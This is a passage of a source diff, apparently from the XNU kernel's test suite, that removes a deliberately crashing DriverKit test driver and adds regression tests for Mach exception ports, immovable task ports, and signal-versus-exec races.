-$(OBJROOT)/$1/DerivedSources/%.iig.cpp: $1/%.iig
-       mkdir -p $(OBJROOT)/$1/DerivedSources
-       # Generate *.iig.cpp and *.h header files from *.iig
-       $(IIG) --def $$^ --impl $$@ --header $$(patsubst %.iig.cpp,%.h,$$@) $(IIGFLAGS)
-
-# Tell make not to delete the intermediate *.iig.cpp file since it is useful for debugging
-.PRECIOUS :: $(OBJROOT)/$1/DerivedSources/%.iig.cpp
-
-$(OBJROOT)/$1/%.o: $1/%.cpp $(patsubst $1/%.iig,$(OBJROOT)/$1/DerivedSources/%.iig.o,$(wildcard $1/*.iig))
-       # Compile c++ file. The additional dependency is for headers emitted by iig
-       $(CXX) $(DEXT_CXXFLAGS) -I$1/ -I$(OBJROOT)/$1/DerivedSources -c $$< -o $$@
-endef
-
-
-ifeq ($(PLATFORM),MacOSX)
-$(foreach DEXTSRCDIR,$(DEXT_SRCS),$(eval $(call GENERATE_DEXT_RULE,$(DEXTSRCDIR))))
-else
-EXCLUDED_SOURCES += $(DEXT_SRCS)
-endif
-
-include $(DEVELOPER_DIR)/AppleInternal/Makefiles/darwintest/Makefile.targets
diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/Info.plist b/tests/driverkit/test_intentionally_crashing_driver_56101852/Info.plist
deleted file mode 100644 (file)
index d4a5346..0000000
+++ /dev/null
@@ -1,70 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>BuildMachineOSBuild</key>
-       <string>19A582a</string>
-       <key>CFBundleDevelopmentRegion</key>
-       <string>en</string>
-       <key>CFBundleExecutable</key>
-       <string>com.apple.test_intentionally_crashing_driver_56101852</string>
-       <key>CFBundleIdentifier</key>
-       <string>com.apple.test_intentionally_crashing_driver_56101852</string>
-       <key>CFBundleInfoDictionaryVersion</key>
-       <string>6.0</string>
-       <key>CFBundleName</key>
-       <string>com.apple.test_intentionally_crashing_driver_56101852</string>
-       <key>CFBundlePackageType</key>
-       <string>DEXT</string>
-       <key>CFBundleShortVersionString</key>
-       <string>1.0</string>
-       <key>CFBundleSupportedPlatforms</key>
-       <array>
-               <string>MacOSX</string>
-       </array>
-       <key>CFBundleVersion</key>
-       <string>1</string>
-       <key>DTCompiler</key>
-       <string>com.apple.compilers.llvm.clang.1_0</string>
-       <key>DTPlatformBuild</key>
-       <string>12A5026a</string>
-       <key>DTPlatformName</key>
-       <string>macosx</string>
-       <key>DTPlatformVersion</key>
-       <string>10.16</string>
-       <key>DTSDKBuild</key>
-       <string></string>
-       <key>DTSDKName</key>
-       <string>driverkit.macosx20.0</string>
-       <key>DTXcode</key>
-       <string>1200</string>
-       <key>DTXcodeBuild</key>
-       <string>12A5026a</string>
-       <key>IOKitPersonalities</key>
-       <dict>
-               <key>test_intentionally_crashing_driver_56101852</key>
-               <dict>
-                       <key>CFBundleIdentifier</key>
-                       <string>com.apple.test_intentionally_crashing_driver_56101852</string>
-                       <key>CFBundleIdentifierKernel</key>
-                       <string>com.apple.kpi.iokit</string>
-                       <key>IOClass</key>
-                       <string>IOUserService</string>
-                       <key>IOMatchCategory</key>
-                       <string>com.apple.test_intentionally_crashing_driver_56101852</string>
-                       <key>IOProviderClass</key>
-                       <string>IOUserResources</string>
-                       <key>IOResourceMatch</key>
-                       <string>IOKit</string>
-                       <key>IOUserClass</key>
-                       <string>test_intentionally_crashing_driver_56101852</string>
-                       <key>IOUserServerName</key>
-                       <string>com.apple.test_intentionally_crashing_driver_56101852</string>
-               </dict>
-       </dict>
-       <key>OSBundleUsageDescription</key>
-       <string></string>
-       <key>OSMinimumDriverKitVersion</key>
-       <string>20.0</string>
-</dict>
-</plist>
diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.cpp b/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.cpp
deleted file mode 100644 (file)
index 96e21dc..0000000
+++ /dev/null
@@ -1,30 +0,0 @@
-//
-//  test_intentionally_crashing_driver_56101852.cpp
-//  test_intentionally_crashing_driver_56101852
-//
-//  Copyright Â© 2019 Apple Inc. All rights reserved.
-//
-
-#include <os/log.h>
-
-#include <DriverKit/IOUserServer.h>
-#include <DriverKit/IOLib.h>
-
-#include "test_intentionally_crashing_driver_56101852.h"
-
-kern_return_t
-IMPL(test_intentionally_crashing_driver_56101852, Start)
-{
-       kern_return_t ret;
-       ret = Start(provider, SUPERDISPATCH);
-       os_log(OS_LOG_DEFAULT, "Hello World");
-       return ret;
-}
-
-/* Intentionally crash */
-__attribute__((constructor)) void
-crash()
-{
-       /* cause SIGILL */
-       __builtin_trap();
-}
diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.entitlements b/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.entitlements
deleted file mode 100644 (file)
index a34733c..0000000
+++ /dev/null
@@ -1,10 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>com.apple.developer.driverkit</key>
-       <true/>
-       <key>com.apple.security.app-sandbox</key>
-       <true/>
-</dict>
-</plist>
diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.iig b/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.iig
deleted file mode 100644 (file)
index 1ebf4fb..0000000
+++ /dev/null
@@ -1,21 +0,0 @@
-//
-//  test_intentionally_crashing_driver_56101852.iig
-//  test_intentionally_crashing_driver_56101852
-//
-//  Copyright Â© 2019 Apple Inc. All rights reserved.
-//
-
-#ifndef test_intentionally_crashing_driver_56101852_h
-#define test_intentionally_crashing_driver_56101852_h
-
-#include <Availability.h>
-#include <DriverKit/IOService.iig>
-
-class test_intentionally_crashing_driver_56101852: public IOService
-{
-public:
-    virtual kern_return_t
-    Start(IOService * provider) override;
-};
-
-#endif /* test_intentionally_crashing_driver_56101852_h */
index 13d4681afd3a4f819a34c7c90c6f3bb32407063f..f91df015f827ec31b8123ba99be3f94b6c886220 100644 (file)
@@ -14,6 +14,8 @@
 #include <uuid/uuid.h>
 #endif
 
+#include "drop_priv.h"
+
 #if TARGET_OS_OSX
 #define INVOKER_UID "SUDO_UID"
 #define INVOKER_GID "SUDO_GID"
@@ -40,8 +42,6 @@ _get_sudo_invoker(const char *var)
 }
 #endif /* TARGET_OS_OSX */
 
-void
-drop_priv(void);
 void
 drop_priv(void)
 {
diff --git a/tests/drop_priv.h b/tests/drop_priv.h
new file mode 100644 (file)
index 0000000..864da83
--- /dev/null
@@ -0,0 +1,6 @@
+#ifndef __DROP_PRIV_H
+#define __DROP_PRIV_H
+
+void drop_priv(void);
+
+#endif /* __DROP_PRIV_H */
index 6084fef4b0c322e62f9fc54e1449064ec5b695bb..83567dcf1d2f270b7143a39013425b9677026f47 100644 (file)
@@ -105,14 +105,36 @@ catch_mach_exception_raise(
        __builtin_unreachable();
 }
 
+/**
+ * This has to be defined for linking purposes, but it's unused.
+ */
+kern_return_t
+catch_mach_exception_raise_state(
+       mach_port_t exception_port,
+       exception_type_t type,
+       exception_data_t codes,
+       mach_msg_type_number_t code_count,
+       int *flavor,
+       thread_state_t in_state,
+       mach_msg_type_number_t in_state_count,
+       thread_state_t out_state,
+       mach_msg_type_number_t *out_state_count)
+{
+#pragma unused(exception_port, type, codes, code_count, flavor, in_state, in_state_count, out_state, out_state_count)
+       T_FAIL("Triggered catch_mach_exception_raise_state() which shouldn't happen...");
+       __builtin_unreachable();
+}
+
 /**
  * Called by mach_exc_server() to handle the exception. This will call the
  * test's exception-handler callback and will then modify
  * the thread state to move to the next instruction.
  */
 kern_return_t
-catch_mach_exception_raise_state(
+catch_mach_exception_raise_state_identity(
        mach_port_t exception_port __unused,
+       mach_port_t thread,
+       mach_port_t task,
        exception_type_t type,
        exception_data_t codes,
        mach_msg_type_number_t code_count,
@@ -138,7 +160,7 @@ catch_mach_exception_raise_state(
        T_ASSERT_EQ(*flavor, EXCEPTION_THREAD_STATE, "The thread state flavor is EXCEPTION_THREAD_STATE");
        T_ASSERT_EQ(in_state_count, EXCEPTION_THREAD_STATE_COUNT, "The thread state count is EXCEPTION_THREAD_STATE_COUNT");
 
-       size_t advance_pc = exc_handler_callback(type, codes_64);
+       size_t advance_pc = exc_handler_callback(task, thread, type, codes_64);
 
        /**
         * Increment the PC by the requested amount so the thread doesn't cause
@@ -155,6 +177,7 @@ catch_mach_exception_raise_state(
        pc = ptrauth_sign_unauthenticated(pc, ptrauth_key_function_pointer, 0);
        arm_thread_state64_set_pc_fptr(*state, pc);
 #else
+       (void)advance_pc;
        T_FAIL("catch_mach_exception_raise_state() not fully implemented on this architecture");
        __builtin_unreachable();
 #endif
@@ -163,28 +186,6 @@ catch_mach_exception_raise_state(
        return KERN_SUCCESS;
 }
 
-/**
- * This has to be defined for linking purposes, but it's unused.
- */
-kern_return_t
-catch_mach_exception_raise_state_identity(
-       mach_port_t exception_port,
-       mach_port_t thread,
-       mach_port_t task,
-       exception_type_t type,
-       exception_data_t codes,
-       mach_msg_type_number_t code_count,
-       int *flavor,
-       thread_state_t in_state,
-       mach_msg_type_number_t in_state_count,
-       thread_state_t out_state,
-       mach_msg_type_number_t *out_state_count)
-{
-#pragma unused(exception_port, thread, task, type, codes, code_count, flavor, in_state, in_state_count, out_state, out_state_count)
-       T_FAIL("Triggered catch_mach_exception_raise_state_identity() which shouldn't happen...");
-       __builtin_unreachable();
-}
-
 mach_port_t
 create_exception_port(exception_mask_t exception_mask)
 {
@@ -209,7 +210,7 @@ create_exception_port(exception_mask_t exception_mask)
                thread,
                exception_mask,
                exc_port,
-               (exception_behavior_t)(EXCEPTION_STATE | MACH_EXCEPTION_CODES),
+               (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES),
                EXCEPTION_THREAD_STATE);
        T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler");
 
index 2ac27c8adb5a05a69c7cf583a9ac9a6b430080e6..60237d5da68533798f0b14d2cf09d6d026ba855c 100644 (file)
  * Callback invoked by run_exception_handler() when a Mach exception is
  * received.
  *
- * @param type  exception type received from the kernel
- * @param codes exception codes received from the kernel
+ * @param task      the task causing the exception
+ * @param thread    the task causing the exception
+ * @param type      exception type received from the kernel
+ * @param codes     exception codes received from the kernel
  *
  * @return      how much the exception handler should advance the program
  *              counter, in bytes (in order to move past the code causing the
  *              exception)
  */
-typedef size_t (*exc_handler_callback_t)(exception_type_t type, mach_exception_data_t codes);
+typedef size_t (*exc_handler_callback_t)(mach_port_t task, mach_port_t thread,
+    exception_type_t type, mach_exception_data_t codes);
 
 mach_port_t
 create_exception_port(exception_mask_t exception_mask);
diff --git a/tests/exception_ports_info.c b/tests/exception_ports_info.c
new file mode 100644 (file)
index 0000000..e27ba56
--- /dev/null
@@ -0,0 +1,178 @@
+#include <darwintest.h>
+#include <mach/mach.h>
+#include <mach/mach_types.h>
+#include <mach/task.h>
+#include <mach/thread_act.h>
+#include <mach_debug/ipc_info.h>
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(true));
+
+T_DECL(exception_ports_info, "Test {task, thread}_get_exception_ports_info")
+{
+       kern_return_t kr;
+       mach_port_t exc_port1, exc_port2, exc_port3;
+
+       mach_msg_type_number_t count = EXC_TYPES_COUNT;
+       exception_mask_t masks[EXC_TYPES_COUNT];
+       ipc_info_port_t ports_info[EXC_TYPES_COUNT];
+       exception_behavior_t behaviors[EXC_TYPES_COUNT];
+       thread_state_flavor_t flavors[EXC_TYPES_COUNT];
+
+       mach_msg_type_number_t count2 = EXC_TYPES_COUNT;
+       exception_mask_t masks2[EXC_TYPES_COUNT];
+       mach_port_t ports[EXC_TYPES_COUNT];
+       exception_behavior_t behaviors2[EXC_TYPES_COUNT];
+       thread_state_flavor_t flavors2[EXC_TYPES_COUNT];
+
+       unsigned int exc_port1_kotype = 0, exc_port1_kaddr = 0;
+       unsigned int exc_port2_kotype = 0, exc_port2_kaddr = 0;
+       unsigned int kotype = 0, kobject = 0, exc_port3_kotype = 0, exc_port3_kaddr = 0;
+       boolean_t found_exc_port1 = false;
+       boolean_t found_exc_port2 = false;
+       boolean_t found_exc_port3 = false;
+
+       ipc_info_space_t info_space;
+       ipc_info_name_array_t table;
+       ipc_info_tree_name_array_t tree;
+       mach_msg_type_number_t tblcnt = 0, treecnt = 0;
+
+       /* Create the mach port the exception messages will be sent to. */
+       kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &exc_port1);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Allocated mach exception port");
+       kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &exc_port2);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Allocated mach exception port");
+       kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &exc_port3);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Allocated mach exception port");
+
+       /*
+        * Insert a send right into the exception port that the kernel will use to
+        * send the exception thread the exception messages.
+        */
+       kr = mach_port_insert_right(mach_task_self(), exc_port1, exc_port1, MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Inserted a SEND right into the exception port");
+       kr = mach_port_insert_right(mach_task_self(), exc_port2, exc_port2, MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Inserted a SEND right into the exception port");
+       kr = mach_port_insert_right(mach_task_self(), exc_port3, exc_port3, MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Inserted a SEND right into the exception port");
+
+       T_LOG("exc_port1: 0x%x", exc_port1);
+       T_LOG("exc_port2: 0x%x", exc_port2);
+       T_LOG("exc_port3: 0x%x", exc_port3);
+
+       /* Tell the kernel what port to send exceptions to. */
+       kr = task_set_exception_ports(
+               mach_task_self(),
+               EXC_MASK_GUARD,
+               exc_port1,
+               (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES),
+               THREAD_STATE_NONE);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler");
+
+       kr = task_set_exception_ports(
+               mach_task_self(),
+               EXC_MASK_RPC_ALERT,  /* why can't be EXC_CRASH or EXC_MASK_CORPSE_NOTIFY ? */
+               exc_port2,
+               (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES),
+               THREAD_STATE_NONE);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler");
+
+       kr = task_set_exception_ports(
+               mach_task_self(),
+               EXC_MASK_RESOURCE | EXC_MASK_BREAKPOINT | EXC_MASK_SYSCALL,
+               exc_port3,
+               (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES),
+               THREAD_STATE_NONE);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler");
+
+       /* now, get exception ports info */
+       kr = thread_get_exception_ports(mach_thread_self(), EXC_MASK_ALL, masks2, &count2, ports, behaviors2, flavors2);
+       T_EXPECT_MACH_SUCCESS(kr, "thread_get_exception_ports(): 0x%x", kr);
+       T_EXPECT_EQ(count2, 0, "should have 0 exception ports");
+
+       kr = thread_get_exception_ports_info(mach_thread_self(), EXC_MASK_ALL, masks, &count, ports_info, behaviors, flavors);
+       T_EXPECT_MACH_SUCCESS(kr, "thread_get_exception_ports_info(): 0x%x", kr);
+       T_EXPECT_EQ(count, 0, "should have 0 exception ports");
+
+       count = EXC_TYPES_COUNT;
+       count2 = EXC_TYPES_COUNT;
+
+       kr = task_get_exception_ports_info(mach_task_self(), EXC_MASK_ALL, masks, &count, ports_info, behaviors, flavors);
+       T_EXPECT_MACH_SUCCESS(kr, "task_get_exception_ports_info(): 0x%x", kr);
+       T_EXPECT_EQ(count, 4, "should have 4 masks"); /* Returns 3 if one exc_port registers for EXC_CRASH */
+
+       /* get exception ports */
+       kr = task_get_exception_ports(mach_task_self(), EXC_MASK_ALL, masks2, &count2, ports, behaviors2, flavors2);
+       T_EXPECT_MACH_SUCCESS(kr, "task_get_exception_ports(): 0x%x", kr);
+
+       for (int i = 0; i < count2; i++) {
+               T_LOG("exception port name: 0x%x", ports[i]);
+       }
+       T_EXPECT_EQ(count, count2, "should return same mask count");
+
+       kr = memcmp(masks, masks2, count * sizeof(exception_mask_t));
+       T_EXPECT_EQ(kr, 0, "masks should be the same");
+
+       kr = memcmp(behaviors, behaviors2, count * sizeof(exception_behavior_t));
+       T_EXPECT_EQ(kr, 0, "behaviors should be the same");
+
+       kr = memcmp(flavors, flavors, count * sizeof(thread_state_flavor_t));
+       T_EXPECT_EQ(kr, 0, "flavors should be the same");
+
+       kr = mach_port_kernel_object(mach_task_self(), mach_task_self(), &kotype, &kobject);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_kernel_object(): 0x%x", kr);
+       T_LOG("task_self kobject: 0x%x", kobject);
+
+       T_QUIET; T_EXPECT_MACH_SUCCESS(mach_port_space_info(mach_task_self(), &info_space, &table,
+           &tblcnt, &tree, &treecnt), "mach_port_space_info(): 0x%x", kr);
+
+       for (int i = 0; i < tblcnt; i++) {
+               if (table[i].iin_name == exc_port1) {
+                       exc_port1_kaddr = table[i].iin_object;
+               }
+               if (table[i].iin_name == exc_port2) {
+                       exc_port2_kaddr = table[i].iin_object;
+               }
+               if (table[i].iin_name == exc_port3) {
+                       exc_port3_kaddr = table[i].iin_object;
+               }
+       }
+
+       T_LOG("exc_port_1_kaddr: 0x%x", exc_port1_kaddr);
+       T_LOG("exc_port_2_kaddr: 0x%x", exc_port2_kaddr);
+       T_LOG("exc_port_3_kaddr: 0x%x", exc_port3_kaddr);
+
+       for (int i = 0; i < count; i++) {
+               T_LOG("ports_info[%d].iip_port_object: 0x%x", i, ports_info[i].iip_port_object);
+
+               if (ports_info[i].iip_port_object == exc_port1_kaddr) {
+                       T_EXPECT_NE(ports_info[i].iip_port_object, 0,
+                           "on debug/kernel, port object should be non-zero: 0x%x", ports_info[i].iip_port_object);
+                       T_EXPECT_EQ(ports_info[i].iip_receiver_object, kobject,
+                           "receiver object should match task self kobject: 0x%x", ports_info[i].iip_receiver_object);
+                       T_EXPECT_EQ(masks[i], EXC_MASK_GUARD, "check if mask for exc_port1 is correct");
+                       found_exc_port1 = true;
+               }
+               if (ports_info[i].iip_port_object == exc_port2_kaddr) {
+                       T_EXPECT_NE(ports_info[i].iip_port_object, 0,
+                           "on debug/kernel, port object should be non-zero: 0x%x", ports_info[i].iip_port_object);
+                       T_EXPECT_EQ(ports_info[i].iip_receiver_object, kobject,
+                           "receiver object should match task self kobject: 0x%x", ports_info[i].iip_receiver_object);
+                       T_EXPECT_EQ(masks[i], EXC_MASK_RPC_ALERT, "check if mask for exc_port2 is correct");
+                       found_exc_port2 = true;
+               }
+               if (ports_info[i].iip_port_object == exc_port3_kaddr) {
+                       T_EXPECT_NE(ports_info[i].iip_port_object, 0,
+                           "on debug/kernel, port object should be non-zero: 0x%x", ports_info[i].iip_port_object);
+                       T_EXPECT_EQ(ports_info[i].iip_receiver_object, kobject,
+                           "receiver object should match task self kobject: 0x%x", ports_info[i].iip_receiver_object);
+                       T_EXPECT_EQ(masks[i], EXC_MASK_RESOURCE | EXC_MASK_BREAKPOINT | EXC_MASK_SYSCALL, "check if mask for exc_port3 is correct");
+                       found_exc_port3 = true;
+               }
+       }
+
+       T_EXPECT_TRUE(found_exc_port1, "should find exc_port1");
+       T_EXPECT_TRUE(found_exc_port2, "should find exc_port2");
+       T_EXPECT_TRUE(found_exc_port3, "should find exc_port3");
+}
diff --git a/tests/exception_tests.c b/tests/exception_tests.c
new file mode 100644 (file)
index 0000000..37517e7
--- /dev/null
@@ -0,0 +1,51 @@
+#include <darwintest.h>
+#include <pthread/private.h>
+#include <sys/sysctl.h>
+#include "exc_helpers.h"
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(true));
+
+static size_t
+exc_immovable_handler(
+       mach_port_t task,
+       mach_port_t thread,
+       __unused exception_type_t type,
+       __unused mach_exception_data_t codes)
+{
+       T_EXPECT_EQ(task, mach_task_self(), "Received immovable task port");
+       T_EXPECT_EQ(thread, pthread_mach_thread_np(pthread_main_thread_np()),
+           "Received immovable thread port");
+       T_END;
+}
+
+T_DECL(exc_immovable, "Test that exceptions receive immovable ports")
+{
+       mach_port_t exc_port = create_exception_port(EXC_MASK_BAD_ACCESS);
+       uint32_t opts = 0;
+       size_t size = sizeof(&opts);
+       mach_port_t mp;
+       kern_return_t kr;
+
+       T_LOG("Check if task_exc_guard exception has been enabled\n");
+       int ret = sysctlbyname("kern.ipc_control_port_options", &opts, &size, NULL, 0);
+       T_EXPECT_POSIX_SUCCESS(ret, "sysctlbyname(kern.ipc_control_port_options)");
+
+       if ((opts & 0x30) == 0) {
+               T_SKIP("immovable rights aren't enabled");
+       }
+
+       kr = task_get_special_port(mach_task_self(), TASK_KERNEL_PORT, &mp);
+       T_EXPECT_MACH_SUCCESS(kr, "task_get_special_port");
+       T_EXPECT_NE(mp, mach_task_self(), "should receive movable port");
+
+       /*
+        * do not deallocate the port we received on purpose to check
+        * that the exception will not coalesce with the movable port
+        * we have in our space now
+        */
+
+       run_exception_handler(exc_port, exc_immovable_handler);
+       *(void *volatile*)0 = 0;
+}
diff --git a/tests/exception_tests.entitlements b/tests/exception_tests.entitlements
new file mode 100644 (file)
index 0000000..bfd52f6
--- /dev/null
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+       <key>com.apple.security.get-movable-control-port</key>
+       <true/>
+</dict>
+</plist>
diff --git a/tests/exec-race-58566604.c b/tests/exec-race-58566604.c
new file mode 100644 (file)
index 0000000..939daf0
--- /dev/null
@@ -0,0 +1,171 @@
+#include <assert.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <signal.h>
+#include <unistd.h>
+#include <errno.h>
+#include <string.h>
+#include <sys/wait.h>
+
+#include <darwintest.h>
+
+// rdar://58566604
+// Exercise races of signal delivery vs exec in multi-threaded processes
+
+T_GLOBAL_META(T_META_NAMESPACE("xnu.exec"),
+    T_META_CHECK_LEAKS(false),
+    T_META_ALL_VALID_ARCHS(true));
+
+enum { KILL_ONCE, KILL_MANY, KILL_LAST } kill_mode;
+enum { EXEC_FIRST, EXEC_SECOND, EXEC_LAST } exec_mode;
+
+static int fd[2];
+
+static void
+do_exec(void)
+{
+       char echo_arg[50] = "";
+
+       snprintf(echo_arg, sizeof(echo_arg), "            Child[%d] says hello after exec", getpid());
+
+       char * new_argv[] = {
+               "/bin/echo",
+               echo_arg,
+               NULL
+       };
+
+       int ret = execv(new_argv[0], new_argv);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "execv()");
+}
+
+static void*
+thread_main(void* arg)
+{
+       T_LOG("mode: %d, %d: Child[%d] created second thread\n",
+           kill_mode, exec_mode, getpid());
+
+       if (exec_mode == EXEC_SECOND) {
+               int ret = dprintf(fd[1], "Hi!");
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "dprintf()");
+               do_exec();
+       }
+
+       while (1) {
+       }
+       return NULL;
+}
+
+void
+run_test(void)
+{
+       T_LOG("mode: %d, %d: Parent[%d]: forking\n",
+           kill_mode, exec_mode, getpid());
+
+       pid_t child_pid = fork();
+
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(child_pid, "fork()");
+
+       int ret = 0;
+
+       if (child_pid == 0) {
+               pthread_t thread;
+               ret = pthread_create(&thread, NULL, thread_main, NULL);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create()");
+
+               if (exec_mode == EXEC_FIRST) {
+                       ret = dprintf(fd[1], "Hi!");
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "dprintf()");
+
+                       do_exec();
+               }
+
+               while (1) {
+               }
+       } else {
+               char buffer[4] = "";
+               ret = read(fd[0], buffer, sizeof(buffer));
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "read()");
+
+               T_LOG("mode: %d, %d: Parent[%d]: got: '%s' from execing child, trying to kill and wait\n",
+                   kill_mode, exec_mode, getpid(), buffer);
+
+               int killcount = 0, status = 0, waitedpid = 0;
+
+               switch (kill_mode) {
+               case KILL_ONCE:
+                       ret = kill(child_pid, SIGKILL);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "kill()");
+
+                       waitedpid = waitpid(child_pid, &status, 0);
+
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(waitedpid, "waitpid()");
+
+                       killcount++;
+                       break;
+               case KILL_MANY:
+                       while (waitedpid == 0) {
+                               ret = kill(child_pid, SIGKILL);
+                               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "kill()");
+
+                               waitedpid = waitpid(child_pid, &status, WNOHANG);
+                               T_QUIET; T_ASSERT_POSIX_SUCCESS(waitedpid, "waitpid()");
+
+                               killcount++;
+                       }
+                       break;
+               default:
+                       break;
+               }
+
+               T_LOG("mode: %d, %d: Parent[%d]: waitpid returned: %d, errno %d (%s), exit signal %d, after %d loops\n",
+                   kill_mode, exec_mode, getpid(), waitedpid, errno, strerror(errno), WTERMSIG(status), killcount);
+       }
+}
+
+T_DECL(exec_exit_race_once_first, "Exec-exit race, one kill, exec on first thread") {
+       int rv = pipe(fd);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()");
+
+       kill_mode = KILL_ONCE;
+       exec_mode = EXEC_FIRST;
+
+       for (int i = 0; i < 1000; i++) {
+               run_test();
+       }
+}
+
+T_DECL(exec_exit_race_many_first, "Exec-exit race, many kill, exec on first thread") {
+       int rv = pipe(fd);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()");
+
+       kill_mode = KILL_MANY;
+       exec_mode = EXEC_FIRST;
+
+       for (int i = 0; i < 1000; i++) {
+               run_test();
+       }
+}
+
+T_DECL(exec_exit_race_once_second, "Exec-exit race, one kill, exec on second thread") {
+       int rv = pipe(fd);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()");
+
+       kill_mode = KILL_ONCE;
+       exec_mode = EXEC_SECOND;
+
+       for (int i = 0; i < 1000; i++) {
+               run_test();
+       }
+}
+
+T_DECL(exec_exit_race_many_second, "Exec-exit race, many kill, exec on second thread") {
+       int rv = pipe(fd);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()");
+
+       kill_mode = KILL_MANY;
+       exec_mode = EXEC_SECOND;
+
+       for (int i = 0; i < 1000; i++) {
+               run_test();
+       }
+}
diff --git a/tests/extract_right_soft_fail.c b/tests/extract_right_soft_fail.c
new file mode 100644 (file)
index 0000000..006512a
--- /dev/null
@@ -0,0 +1,114 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <darwintest.h>
+#include <mach/mach.h>
+#include <mach/mach_vm.h>
+#include <sys/sysctl.h>
+#include <spawn.h>
+#include <signal.h>
+
+#define IKOT_TASK_CONTROL 2
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(TRUE));
+
+static void
+test_extract_immovable_task_port(pid_t pid)
+{
+       kern_return_t kr;
+       mach_port_t tport = MACH_PORT_NULL;
+       ipc_info_space_t space_info;
+       ipc_info_name_array_t table;
+       mach_msg_type_number_t tableCount;
+       ipc_info_tree_name_array_t tree; /* unused */
+       mach_msg_type_number_t treeCount; /* unused */
+
+       mach_port_t extracted;
+       mach_msg_type_name_t right;
+
+
+       kr = task_for_pid(mach_task_self(), pid, &tport);
+       T_EXPECT_MACH_SUCCESS(kr, "task_for_pid(), tport: 0x%x", tport);
+
+       T_LOG("Target pid: %d", pid);
+
+       if (pid == getpid()) {
+               /* self extraction should succeed */
+               kr = mach_port_extract_right(mach_task_self(), mach_task_self(), MACH_MSG_TYPE_COPY_SEND, &extracted, &right);
+               T_EXPECT_MACH_SUCCESS(kr, "mach_port_extract_right() on immovable port in current space should succeed");
+       } else {
+               unsigned int kotype = 0, kobject = 0;
+               mach_port_name_t tport_name = MACH_PORT_NULL;
+               kr = mach_port_space_info(tport, &space_info, &table, &tableCount, &tree, &treeCount);
+               T_EXPECT_MACH_SUCCESS(kr, "mach_port_space_info()");
+
+               for (int i = 0; i < tableCount; i++) {
+                       T_LOG("Searching for task port..name: 0x%x", table[i].iin_name);
+                       kr = mach_port_kernel_object(tport, table[i].iin_name, &kotype, &kobject);
+                       if (KERN_SUCCESS == kr && kotype == IKOT_TASK_CONTROL) {
+                               tport_name = table[i].iin_name;
+                               break;
+                       } else if (kr) {
+                               T_LOG("mach_port_kernel_object() failed on name 0x%x, kr: 0x%x", table[i].iin_name, kr);
+                       }
+               }
+
+               if (!tport_name) {
+                       T_FAIL("Did not find task port in child's space");
+               }
+               T_LOG("Remote tport name: 0x%x", tport_name);
